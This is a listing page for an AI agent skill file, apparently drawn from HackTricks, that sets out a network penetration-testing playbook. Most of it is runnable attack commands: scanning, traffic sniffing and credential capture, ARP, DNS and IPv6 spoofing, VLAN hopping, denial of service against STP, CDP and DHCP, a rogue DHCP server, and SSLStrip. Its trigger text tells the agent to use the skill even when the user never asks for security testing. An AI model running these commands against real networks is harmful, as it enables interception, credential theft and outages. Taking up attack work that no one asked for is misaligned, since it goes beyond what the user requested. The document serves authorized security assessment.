OpenSkillIndex← back to search

Hacktricks-skills network-pentest

Network penetration testing and security assessment. Use this skill whenever the user mentions network security testing, penetration testing, network assessment, port scanning, vulnerability discovery, network reconnaissance, ARP spoofing, VLAN attacks, sniffing, or any network-related security testing. This skill provides structured methodologies for discovering hosts, scanning ports, performing LAN attacks, and documenting findings. Make sure to use this skill for any network security assessment task, even if the user doesn't explicitly ask for a 'pentest' or 'security assessment'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/generic-methodologies-and-resources/pentesting-network/pentesting-network/SKILL.MD
source content

Network Pentesting Skill

A comprehensive skill for conducting network security assessments and penetration tests. This skill provides structured methodologies for network discovery, scanning, and attack techniques.

Before You Start

Important: Always ensure you have proper authorization before performing any network security testing. Unauthorized network scanning or attacks may be illegal.

Workflow Overview

  1. Reconnaissance - Discover hosts and services
  2. Scanning - Identify open ports and services
  3. Enumeration - Gather detailed information
  4. Exploitation - Test vulnerabilities (if authorized)
  5. Documentation - Record findings

Phase 1: Network Discovery

External Discovery (From Internet)

When you need to discover hosts from outside a network:

ICMP Discovery (Fastest)

# Single host
ping -c 1 <IP>

# Range scan
fping -g <network>/24

# Advanced ICMP types (bypasses some filters)
nmap -PE -PM -PP -sn -n <network>/24

TCP Port Discovery

When ICMP is filtered, scan common ports:

# Masscan for speed (top 20 ports, <5 min for /24)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 <network>/24

# HTTP-focused
masscan -p80,443,8000-8100,8443 <network>/24

UDP Discovery

# Nmap with version detection
nmap -sU -sV --version-intensity 0 -F -n <network>/24

# Fast UDP scanner (1 min for /24)
./udp-proto-scanner.pl <network>/24

Internal Discovery (From Inside Network)

Passive Discovery

# ARP cache monitoring
netdiscover -p

# Traffic analysis
p0f -i <interface> -p -o /tmp/p0f.log

# Bettercap passive
net.recon on
net.show
set net.show.meta true

Active Discovery

# ARP scan
nmap -sn <network>
netdiscover -r <network>

# NetBIOS discovery
nbtscan -r <network>

# Bettercap active probing
net.probe on
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
set net.probe.wsd true

# IPv6 discovery
alive6 <interface>

Wake-on-LAN

# Bettercap WOL
wol.eth [MAC]  # Raw ethernet packet
wol.udp [MAC]  # UDP broadcast to port 9

Phase 2: Port Scanning

TCP Scanning

# Fast scan (top 1000 ports)
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>

# Full port scan (all 65535 ports)
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>

# Slower full scan (avoid failures)
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

# Bettercap SYN scan
syn.scan <network> 1 10000

UDP Scanning

# Common UDP services
udp-proto-scanner.pl <IP>

# Top 100 UDP ports
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>

# With default scripts
nmap -sU -sV -sC -n -F -T4 <IP>

# Top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>

SCTP Scanning

# Fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>

# Full SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

Phase 3: Network Sniffing

TCPDump

# DNS traffic
sudo tcpdump -i <interface> udp port 53

# ICMP traffic
tcpdump -i <interface> icmp

# HTTP/HTTPS to file (rotate every 5 min)
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

# Remote capture via SSH
ssh user@<IP> tcpdump -i <interface> -U -s0 -w - | sudo wireshark -k -i -

Bettercap Sniffing

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap
set net.sniff.local false
set net.sniff.filter "not arp"

Credential Capture

# Parse credentials from pcap
git clone https://github.com/lgandx/PCredz
cd PCredz && ./PCredz.py <capture.pcap>

Phase 4: LAN Attacks

ARP Spoofing

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Bettercap
arp.spoof on
set arp.spoof.targets <IP>
set arp.spoof.fullduplex true
set arp.spoof.internal true

# Arpspoof (two terminals)
arpspoof -t <gateway> <victim>
arpspoof -t <victim> <gateway>

VLAN Attacks

DTP Trunking Attack

# Install Yersinia
apt-get install yersinia

# Interactive mode
yersinia -I
# Select interface, then 'g' for protocol, 'x' for attack

# DTP hijacking
sudo python3 DTPHijacking.py --interface <interface>

VLAN Interface Creation

# Load module and create VLAN interface
modprobe 8021q
vconfig add <interface> <VLAN_ID>

# Get IP via DHCP
dhclient <interface>.<VLAN_ID>

# Or set static IP
ifconfig <interface>.<VLAN_ID> <IP> netmask 255.255.255.0 up

# Scan the VLAN
arp-scan -I <interface>.<VLAN_ID> <network>/24

Double Tagging Attack

# Using Scapy
from scapy.all import *
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='<victim>')/ICMP()
sendp(packet)

STP Attacks

# BPDU DoS
yersinia stp -attack 2  # Topology Change Notification
yersinia stp -attack 3  # Configuration BPDUs

# CAM table flush
yersinia stp -attack 1  # Send TCP packet

# Root bridge attack
yersinia stp -attack 4  # Become root switch
yersinia stp -attack 6  # DoS (layer 2 packets not forwarded)

CDP Attacks

# Passive collection (sniff CDP packets)
# Use Wireshark, tcpdump, or Yersinia

# CDP DoS (flood fake devices)
yersinia cdp -attack 1

# CDP impersonation
yersinia cdp -attack 2  # Simulate new Cisco device
yersinia cdp -attack 0  # Send CDP packet

DHCP Attacks

# DHCP enumeration
nmap --script broadcast-dhcp-discover

# DHCP DoS
yersinia dhcp -attack 1  # Exhaust IP pool
yersinia dhcp -attack 3  # Release all IPs

# Rogue DHCP server
python /usr/share/responder/DHCP.py \
  -i <your_ip> \
  -r <real_gateway> \
  -p <your_dns> \
  -n 255.255.255.0 \
  -I <interface> \
  -w "http://<your_ip>/wpad.dat" \
  -S -R

Phase 5: Spoofing Attacks

DNS Spoofing

# Bettercap
set dns.spoof.hosts ./dns.spoof.hosts
dns.spoof on

# Dnsmasq
apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon

ICMP Redirect

# Using hping3
hping3 <victim> -C 5 -K 1 \
  -a <gateway> \
  --icmp-gw <attacker> \
  --icmp-ipdst <destination> \
  --icmp-ipsrc <victim>

IPv6 Spoofing

# Neighbor spoofing
sudo parasite6 -l <interface>
sudo fake_advertise6 -r -w 2 <interface> <router_ipv6>

# Router advertisement spoofing
sysctl -w net.ipv6.conf.all.forwarding=1
ip route add default via <router_ipv6> dev <interface>
fake_router6 <interface> <fe80_address>/16

# DHCPv6 spoofing
dhcp6.spoof on
dhcp6.spoof.domains <domains>
mitm6

Phase 6: Internet Attacks

SSLStrip

# Install and configure
apt-get install sslstrip

# Start sslstrip
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k

# Redirect HTTP traffic
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Note: SSLStrip is largely ineffective against modern browsers with HSTS preloading. Consider sslStrip+ or dns2proxy for HSTS bypass (still limited effectiveness).

Phase 7: Bluetooth Attacks

L2CAP/ATT/GATT Testing

# Using BlueBlue framework
from blueblue import *

acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

Documentation Template

Always document your findings:

# Network Security Assessment Report

## Target Information
- Network Range: <range>
- Date: <date>
- Assessor: <name>

## Discovery Results
### Live Hosts
| IP | MAC | Hostname | Status |
|----|-----|----------|--------|
| <IP> | <MAC> | <hostname> | <status> |

### Open Ports
| IP | Port | Service | Version |
|----|------|---------|--------|
| <IP> | <port> | <service> | <version> |

## Vulnerabilities Found
1. <vulnerability>
   - Severity: <critical/high/medium/low>
   - Description: <details>
   - Evidence: <proof>
   - Remediation: <recommendation>

## Attack Results
- ARP Spoofing: <success/fail>
- VLAN Hopping: <success/fail>
- DHCP Spoofing: <success/fail>

## Recommendations
1. <recommendation>
2. <recommendation>

Tool Quick Reference

ToolPurposeCommand
nmapPort scanning
nmap -sV -sC <target>
masscanFast port scanning
masscan -p<ports> <target>
bettercapMITM attacks
bettercap
yersiniaProtocol attacks
yersinia -I
tcpdumpPacket capture
tcpdump -i <iface> <filter>
arp-scanARP discovery
arp-scan -l
responderLLMNR/NBT-NS spoofing
responder -I <iface>
sslstripSSL downgrading
sslstrip -l 10000

Safety Reminders

  1. Authorization: Always have written permission before testing
  2. Scope: Stay within agreed network boundaries
  3. Timing: Avoid production hours for disruptive tests
  4. Backup: Document network state before attacks
  5. Legal: Understand local laws regarding network testing
  6. Cleanup: Restore network to original state after testing

When to Use This Skill

Use this skill when:

  • User mentions network security testing or penetration testing
  • User needs to discover hosts on a network
  • User wants to scan ports or enumerate services
  • User is conducting a security assessment
  • User mentions specific attack techniques (ARP spoofing, VLAN attacks, etc.)
  • User needs documentation templates for security findings
  • User asks about network reconnaissance tools
  • User mentions network protocols in a security context (CDP, STP, DHCP, etc.)

This skill provides the methodology, commands, and best practices for professional network security assessments.